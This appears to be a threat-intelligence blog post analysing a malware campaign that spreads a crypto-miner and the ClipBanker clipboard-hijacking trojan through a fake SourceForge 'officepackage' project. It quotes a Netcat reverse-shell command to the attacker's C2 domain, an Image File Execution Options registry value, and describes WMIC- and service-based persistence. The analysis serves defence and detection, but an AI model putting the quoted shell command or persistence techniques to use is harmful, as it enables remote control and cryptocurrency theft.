Skip to main content

Command Palette

Search for a command to run...

Hackers Distribute ClipBanker Trojan via SourceForge Platform

Updated
6 min read
Hackers Distribute ClipBanker Trojan via SourceForge Platform

Recently, security experts discovered a sophisticated malware distribution campaign exploiting SourceForge, a popular website providing hosting, distribution, and software review services. SourceForge allows anyone to upload software projects, inadvertently creating opportunities for malicious actors.

Exploitation Scenario

This campaign exploits a project named "officepackage." On the official website sourceforge.net, this project appears harmless, completely mimicking a legitimate GitHub project with Microsoft Office extensions.

Description of the "officepackage" project

Figure 1. Description of the “officepackage” project

However, this project is given an additional subdomain in the form of sourceforge.io, specifically officepackage.sourceforge.io, where the content is entirely different, displaying a list of office applications with "Download" buttons.

Example of a search query and results containing officepackage.sourceforge.io

Figure 2. Example of a search query and results containing officepackage.sourceforge.io

The project as seen on the officepackage.sourcefoge.io domain

Figure 3. The project as seen on the officepackage.sourcefoge.io domain

When clicking the download button, users are redirected through several intermediary steps, eventually downloading a small compressed file about 7 MB named vinstaller.zip. This is the first anomaly, as office applications are typically not this small. Inside this file is another compressed file, installer.zip (password-protected), and a Readme.txt file containing the password.

Contents of vinstaller.zip

Figure 4. Contents of vinstaller.zip

After extraction, users receive an installer.msi file over 700 MB in size. The attacker deliberately inflates the file size using junk data insertion techniques to deceive users. After removing the excess data, the file is actually only about 7 MB.

Contents of installer.zip

Figure 5. Contents of installer.zip

When users run this file, the installer creates several other files, notably the UnRAR.exe extraction tool and a password-protected compressed file 51654.rar. A Visual Basic script continues to download and execute a batch script from GitHub, named confvk, containing the password to open this RAR file. From here, the malware checks the computer's security measures and automatically aborts if it detects a risk of being analyzed.

The infection chain: from launching the installer to downloading the confvk batch script

Figure 6. Infection chain: from launching the installer to downloading the confvk batch script

If it passes the security check, the malware automatically sets up various startup mechanisms with the system to ensure long-term access. It also sends detailed information about the victim's computer (IP address, country, CPU name, operating system, username, and antivirus software in use) via Telegram.

Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script

Figure 7. Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script

Finally, the malware installs two dangerous types of malware: one is cryptocurrency mining software, and the other is ClipBanker – a type of malware that specializes in stealing cryptocurrency by changing the wallet address in the clipboard to the attacker's address.

Technical Analysis

1. Contents of file 51654.rar

The RAR file contains the following files:

  • Input.exe: AutoIt script interpreter (allows running automation scripts).

  • Icon.dll and Kape.dll: Clean dynamic link libraries (DLL) but embedded with AutoIt malware.

  • ShellExperienceHost.exe: Netcat networking tool (used to create network connections).

  • libssl-1_1.dll, vcruntime140.dll, libcrypto-1_1.dll: Auxiliary libraries for the Netcat tool.

Contents of the RAR archive

Figure 8. Contents of file 51654.rar

2. Operation of the batch file confvz

The batch file confvz performs the following steps:

Step 1 - Create directories and distribute malicious files:

  • Create 3 subdirectories in %ProgramData% and move the files into them:

    • First directory: contains Input.exe and Icon.dll.

    • Second directory: contains another copy of Input.exe along with Kape.dll.

    • Third directory: contains files related to Netcat.

Step 2 - Create startup scripts:

  • Create two batch scripts in %USERPROFILE%\Cookies\ named ini.cmd and init.cmd.

  • These scripts are used to run Input.exe and pass parameters as the malicious DLLs (Icon.dll and Kape.dll).

Step 3 - Set up registry for background startup:

  • Create registry keys to allow running files by simply typing short names, for example:

    • install.exe will run ini.cmd.

    • start.exe will run init.cmd.

    • Setup.exe links to the tool %WINDIR%\System32\oobe\Setup.exe, commonly used when installing Windows.

Step 4 - Set up Windows services:

  • Create Windows services to run in the background:

    • NetworkConfiguration and PerformanceMonitor: start the batch files.

    • Update: directly run the AutoIt interpreter.

Step 5 - Backup plan:

  • Set up an additional registry key: "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe"

  • This causes Windows to automatically run start.exe whenever MicrosoftEdgeUpdate.exe is executed, leading to the execution of init.cmd.

Contents of the confvz batch file

Figure 9. Contents of the confvz batch file

3. Creating a backdoor using Netcat

  • confvz uses Windows' WMIC tool to set up an event filter, triggering the following command every 80 seconds:

    • ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe
  • ShellExperienceHost.exe here is a version of Netcat, creating an encrypted connection to a remote control server (C2 server) at the domain apap.app via port 445, allowing the attacker to control the system remotely through the command line.

4. Exploiting Windows error handling to start malware

  • confvz also creates a file: “%WINDIR%\Setup\Scripts\ErrorHandler.cmd“

  • Typically, Windows uses this file to handle critical errors during the operating system installation process. The malware exploits this mechanism to start automatically by setting up another WMIC event filter, triggering every 300 seconds to run the malicious script in ErrorHandler.cmd.

  • This file contains a PowerShell script using the Telegram API to download and execute a remote control code (C2).

5. Final goal of the malware

  • The two malicious DLL files (Icon.dll and Kape.dll) when executed by Input.exe, perform the following actions:

    • Icon.dll: Runs a cryptocurrency mining malware (crypto-miner) that consumes system resources.

    • Kape.dll: Installs ClipBanker, a malware that changes the cryptocurrency wallet address stored in the victim's clipboard to the attacker's wallet address, thereby stealing the user's cryptocurrency.

The infection chain: from executing confvk to setting up all the auto-start methods

Figure 10. Infection chain: from executing confvk to setting up all the auto-start methods

Impact Level

According to recorded data, the site officepackage.sourceforge.io primarily targets Russian-speaking users. About 90% of the victims are from Russia, with over 4,600 people affected from early January to the end of March.

Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent this attack campaign:

  • User awareness training: Warn users not to download and execute files from unclear sources, especially emphasizing the risks from cracked software and untrustworthy links.

  • Implement Email Security solutions: Use email filtering tools to block emails containing malicious files and links.

  • Secure browsers and systems: Enable advanced protection features on browsers and systems to detect and prevent malware execution.

  • Deploy Endpoint Protection solutions: Set up Endpoint protection measures to detect and block abnormal behaviors, especially malicious PowerShell commands.

  • Use cybersecurity services: Monitor and analyze network traffic to detect unusual signs such as connections to suspicious domains, using firewalls and IDS to monitor and respond promptly.

  • Regular updates: Ensure the operating system, antivirus software, and applications are always updated to the latest versions to minimize security risks.

References

Newsletters-eng

Part 1 of 50

More from this blog

F

FPT IS Security

726 posts

Dedicated to providing insightful articles on cybersecurity threat intelligence, aimed at empowering individuals and organizations to navigate the digital landscape safely.